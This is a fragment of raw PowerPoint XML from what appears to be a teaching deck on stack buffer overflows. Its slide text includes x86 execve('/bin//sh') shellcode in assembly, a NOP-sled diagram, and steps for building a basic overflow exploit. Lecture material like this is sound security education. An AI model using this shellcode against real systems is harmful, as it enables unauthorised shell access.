              <a:t>kernel_panik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>www.shell-storm.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/files/shellcode-752.php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1295400"/>
            <a:ext cx="3276600" cy="4343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/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx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mul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"/>
              <a:t>push 0x68732f2f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>push 0x6e69622f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0"/>
              <a:t>mov al, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0xb</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2800" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p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712767"/>
            <a:ext cx="144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Shellcode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245525"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6720396" y="1597967"/>
          <a:ext cx="1143000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0x68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0x73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0x2f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0x2f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0x6e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0x69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0x62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0x2f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5369279"/>
            <a:ext cx="638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esp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13312"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7924800" y="1597967"/>
          <a:ext cx="1143000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0x0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h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s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/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/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n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5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/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78810"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="3124200"/>
          <a:ext cx="2004066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2033"/>
                <a:gridCol w="10020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ebx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esp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ecx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eax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0x0b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6124616" y="5600112"/>
            <a:ext cx="595780" cy="38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22342" y="4569767"/>
            <a:ext cx="1508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Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5031432"/>
            <a:ext cx="16002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0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6388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Factors affecting the stack frame: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tatically declared buffers may be padded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hat about space for callee-save </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>regs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[advanced] what if some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> are in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>regs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> only?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>[advanced] what if compiler reorder</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>local variables on stack?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is your friend!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>google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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t> quick reference)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Don’t just brute force or guess offsets.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>Think!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806398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6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nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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44196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WARNING:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Environment changes address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r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$ OLDPWD=“” ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$ OLDPWD=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>aaaa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vuln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81333"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6838918" y="1479548"/>
          <a:ext cx="1461558" cy="4665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env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7271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6" name="Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="2514600"/>
            <a:ext cx="1600200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64078"/>
              <a:gd name="adj2" fmla="val -80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Overwrite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> with any position in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> slide ok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876800" y="3702440"/>
            <a:ext cx="3423676" cy="1707760"/>
            <a:chOff x="4876800" y="3702440"/>
            <a:chExt cx="3423676" cy="1707760"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6838918" y="4480120"/>
              <a:ext cx="1461558" cy="9144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0x90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...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0x90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6324600" y="4495800"/>
              <a:ext cx="381000" cy="914400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4876800" y="4800600"/>
              <a:ext cx="1219200" cy="609600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 74365"/>
                <a:gd name="adj2" fmla="val -23953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nop</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> slide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38918" y="3702440"/>
              <a:ext cx="1461558" cy="762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execve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0" name="Snip Single Corner Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5181599"/>
            <a:ext cx="3810000" cy="1311275"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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err="1" smtClean="0"/>
              <a:t>Protip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>: Inserting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nop’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (e.g., 0x90) into shellcode allow for slack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7350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 generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> for a basic buffer overflow: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Determine size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack frame up to head of buffer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Overflow buffer with the right size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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>omputation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>                     +                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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82880"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1028700" y="3612196"/>
          <a:ext cx="70866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1900"/>
                <a:gridCol w="2209800"/>
                <a:gridCol w="1104900"/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Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="3688396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72200" y="2286002"/>
            <a:ext cx="2590800" cy="3733799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Cambria"/>
              </a:rPr>
              <a:t>Black</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="appst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40" y="2895599"/>
            <a:ext cx="2377760" cy="2084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0596" y="4339535"/>
            <a:ext cx="2030604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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>format c: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3400" y="2286002"/>
            <a:ext cx="2590800" cy="373379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Cambria"/>
              </a:rPr>
              <a:t>White</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="appst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0" y="2895600"/>
            <a:ext cx="2377760" cy="2084848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="wifi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2" y="3943643"/>
            <a:ext cx="1047995" cy="10038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Rounded Rectangular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1501280"/>
            <a:ext cx="1447800" cy="708520"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 35728"/>
              <a:gd name="adj2" fmla="val 274264"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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Cambria"/>
              </a:rPr>
              <a:t>Bug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92480" y="1289579"/>
            <a:ext cx="2795437" cy="3860431"/>
            <a:chOff x="3092478" y="1289579"/>
            <a:chExt cx="2795437" cy="3860430"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="Picture 10" descr="bom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34412">
              <a:off x="3104415" y="1964402"/>
              <a:ext cx="3352800" cy="2003154"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11" descr="arrow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35549">
              <a:off x="3092478" y="3352800"/>
              <a:ext cx="2795437" cy="1797209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3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7387" y="589003"/>
            <a:ext cx="2379809" cy="80021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5200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668746" y="3778830"/>
            <a:ext cx="1083854" cy="1301485"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 508000 w 1367174"/>
              <a:gd name="connsiteY0" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX1" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY1" fmla="*/ 91250 h 1301485"/>
              <a:gd name="connsiteX2" fmla="*/ 283883 w 1367174"/>
              <a:gd name="connsiteY2" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX3" fmla="*/ 239059 w 1367174"/>
              <a:gd name="connsiteY3" fmla="*/ 121132 h 1301485"/>
              <a:gd name="connsiteX4" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY4" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX5" fmla="*/ 89647 w 1367174"/>
              <a:gd name="connsiteY5" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX6" fmla="*/ 74706 w 1367174"/>
              <a:gd name="connsiteY6" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX7" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY7" fmla="*/ 315368 h 1301485"/>
              <a:gd name="connsiteX8" fmla="*/ 29883 w 1367174"/>
              <a:gd name="connsiteY8" fmla="*/ 405015 h 1301485"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1367174"/>
              <a:gd name="connsiteY9" fmla="*/ 494662 h 1301485"/>
              <a:gd name="connsiteX10" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY10" fmla="*/ 927956 h 1301485"/>
              <a:gd name="connsiteX11" fmla="*/ 59765 w 1367174"/>
              <a:gd name="connsiteY11" fmla="*/ 972780 h 1301485"/>
              <a:gd name="connsiteX12" fmla="*/ 119530 w 1367174"/>
              <a:gd name="connsiteY12" fmla="*/ 1047485 h 1301485"/>
              <a:gd name="connsiteX13" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY13" fmla="*/ 1107250 h 1301485"/>
              <a:gd name="connsiteX14" fmla="*/ 194235 w 1367174"/>
              <a:gd name="connsiteY14" fmla="*/ 1152074 h 1301485"/>
              <a:gd name="connsiteX15" fmla="*/ 298824 w 1367174"/>
              <a:gd name="connsiteY15" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX16" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY16" fmla="*/ 1226780 h 1301485"/>
              <a:gd name="connsiteX17" fmla="*/ 403412 w 1367174"/>
              <a:gd name="connsiteY17" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX18" fmla="*/ 493059 w 1367174"/>
              <a:gd name="connsiteY18" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX19" fmla="*/ 582706 w 1367174"/>
              <a:gd name="connsiteY19" fmla="*/ 1301485 h 1301485"/>
              <a:gd name="connsiteX20" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY20" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX21" fmla="*/ 1180353 w 1367174"/>
              <a:gd name="connsiteY21" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX22" fmla="*/ 1210235 w 1367174"/>
              <a:gd name="connsiteY22" fmla="*/ 1211838 h 1301485"/>
              <a:gd name="connsiteX23" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY23" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX24" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY24" fmla="*/ 1137132 h 1301485"/>
              <a:gd name="connsiteX25" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY25" fmla="*/ 1032544 h 1301485"/>
              <a:gd name="connsiteX26" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY26" fmla="*/ 434897 h 1301485"/>
              <a:gd name="connsiteX27" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY27" fmla="*/ 375132 h 1301485"/>
              <a:gd name="connsiteX28" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY28" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX29" fmla="*/ 1165412 w 1367174"/>
              <a:gd name="connsiteY29" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX30" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY30" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX31" fmla="*/ 1001059 w 1367174"/>
              <a:gd name="connsiteY31" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX32" fmla="*/ 956235 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 76309 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX37" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY37" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX0" fmla="*/ 508000 w 1367174"/>
              <a:gd name="connsiteY0" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX1" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY1" fmla="*/ 91250 h 1301485"/>
              <a:gd name="connsiteX2" fmla="*/ 283883 w 1367174"/>
              <a:gd name="connsiteY2" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX3" fmla="*/ 239059 w 1367174"/>
              <a:gd name="connsiteY3" fmla="*/ 121132 h 1301485"/>
              <a:gd name="connsiteX4" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY4" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX5" fmla="*/ 89647 w 1367174"/>
              <a:gd name="connsiteY5" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX6" fmla="*/ 74706 w 1367174"/>
              <a:gd name="connsiteY6" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX7" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY7" fmla="*/ 315368 h 1301485"/>
              <a:gd name="connsiteX8" fmla="*/ 29883 w 1367174"/>
              <a:gd name="connsiteY8" fmla="*/ 405015 h 1301485"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1367174"/>
              <a:gd name="connsiteY9" fmla="*/ 494662 h 1301485"/>
              <a:gd name="connsiteX10" fmla="*/ 44824 w 1367174"/>
              <a:gd name="connsiteY10" fmla="*/ 927956 h 1301485"/>
              <a:gd name="connsiteX11" fmla="*/ 59765 w 1367174"/>
              <a:gd name="connsiteY11" fmla="*/ 972780 h 1301485"/>
              <a:gd name="connsiteX12" fmla="*/ 119530 w 1367174"/>
              <a:gd name="connsiteY12" fmla="*/ 1047485 h 1301485"/>
              <a:gd name="connsiteX13" fmla="*/ 179294 w 1367174"/>
              <a:gd name="connsiteY13" fmla="*/ 1107250 h 1301485"/>
              <a:gd name="connsiteX14" fmla="*/ 194235 w 1367174"/>
              <a:gd name="connsiteY14" fmla="*/ 1152074 h 1301485"/>
              <a:gd name="connsiteX15" fmla="*/ 298824 w 1367174"/>
              <a:gd name="connsiteY15" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX16" fmla="*/ 343647 w 1367174"/>
              <a:gd name="connsiteY16" fmla="*/ 1226780 h 1301485"/>
              <a:gd name="connsiteX17" fmla="*/ 403412 w 1367174"/>
              <a:gd name="connsiteY17" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX18" fmla="*/ 493059 w 1367174"/>
              <a:gd name="connsiteY18" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX19" fmla="*/ 582706 w 1367174"/>
              <a:gd name="connsiteY19" fmla="*/ 1301485 h 1301485"/>
              <a:gd name="connsiteX20" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY20" fmla="*/ 1271603 h 1301485"/>
              <a:gd name="connsiteX21" fmla="*/ 1180353 w 1367174"/>
              <a:gd name="connsiteY21" fmla="*/ 1241721 h 1301485"/>
              <a:gd name="connsiteX22" fmla="*/ 1210235 w 1367174"/>
              <a:gd name="connsiteY22" fmla="*/ 1211838 h 1301485"/>
              <a:gd name="connsiteX23" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY23" fmla="*/ 1196897 h 1301485"/>
              <a:gd name="connsiteX24" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY24" fmla="*/ 1137132 h 1301485"/>
              <a:gd name="connsiteX25" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY25" fmla="*/ 1032544 h 1301485"/>
              <a:gd name="connsiteX26" fmla="*/ 1344706 w 1367174"/>
              <a:gd name="connsiteY26" fmla="*/ 434897 h 1301485"/>
              <a:gd name="connsiteX27" fmla="*/ 1299883 w 1367174"/>
              <a:gd name="connsiteY27" fmla="*/ 375132 h 1301485"/>
              <a:gd name="connsiteX28" fmla="*/ 1255059 w 1367174"/>
              <a:gd name="connsiteY28" fmla="*/ 285485 h 1301485"/>
              <a:gd name="connsiteX29" fmla="*/ 1165412 w 1367174"/>
              <a:gd name="connsiteY29" fmla="*/ 225721 h 1301485"/>
              <a:gd name="connsiteX30" fmla="*/ 1090706 w 1367174"/>
              <a:gd name="connsiteY30" fmla="*/ 165956 h 1301485"/>
              <a:gd name="connsiteX31" fmla="*/ 1001059 w 1367174"/>
              <a:gd name="connsiteY31" fmla="*/ 106191 h 1301485"/>
              <a:gd name="connsiteX32" fmla="*/ 851647 w 1367174"/>
              <a:gd name="connsiteY32" fmla="*/ 46427 h 1301485"/>
              <a:gd name="connsiteX33" fmla="*/ 806824 w 1367174"/>
              <a:gd name="connsiteY33" fmla="*/ 31485 h 1301485"/>
              <a:gd name="connsiteX34" fmla="*/ 732118 w 1367174"/>
              <a:gd name="connsiteY34" fmla="*/ 16544 h 1301485"/>
              <a:gd name="connsiteX35" fmla="*/ 687294 w 1367174"/>
              <a:gd name="connsiteY35" fmla="*/ 1603 h 1301485"/>
              <a:gd name="connsiteX36" fmla="*/ 567765 w 1367174"/>
              <a:gd name="connsiteY36" fmla="*/ 1603 h 130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67174" h="1301485">
                <a:moveTo>
                  <a:pt x="508000" y="16544"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447040" y="47024"/>
                  <a:pt x="407086" y="70104"/>
                  <a:pt x="343647" y="91250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324166" y="97744"/>
                  <a:pt x="303627" y="100550"/>
                  <a:pt x="283883" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268739" y="110518"/>
                  <a:pt x="254000" y="116152"/>
                  <a:pt x="239059" y="121132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219137" y="136073"/>
                  <a:pt x="199695" y="151676"/>
                  <a:pt x="179294" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149872" y="186551"/>
                  <a:pt x="89647" y="225721"/>
                  <a:pt x="89647" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84667" y="245642"/>
                  <a:pt x="83889" y="267118"/>
                  <a:pt x="74706" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68406" y="298085"/>
                  <a:pt x="49770" y="302178"/>
                  <a:pt x="44824" y="315368"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34187" y="343734"/>
                  <a:pt x="37231" y="375625"/>
                  <a:pt x="29883" y="405015"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22243" y="435573"/>
                  <a:pt x="9961" y="464780"/>
                  <a:pt x="0" y="494662"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16234" y="697579"/>
                  <a:pt x="2102" y="778427"/>
                  <a:pt x="44824" y="927956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49151" y="943100"/>
                  <a:pt x="52722" y="958693"/>
                  <a:pt x="59765" y="972780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78613" y="1010477"/>
                  <a:pt x="91735" y="1019691"/>
                  <a:pt x="119530" y="1047485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159373" y="1167017"/>
                  <a:pt x="99608" y="1027563"/>
                  <a:pt x="179294" y="1107250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="190430" y="1118387"/>
                  <a:pt x="183098" y="1140937"/>
                  <a:pt x="194235" y="1152074"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212698" y="1170537"/>
                  <a:pt x="272036" y="1187968"/>
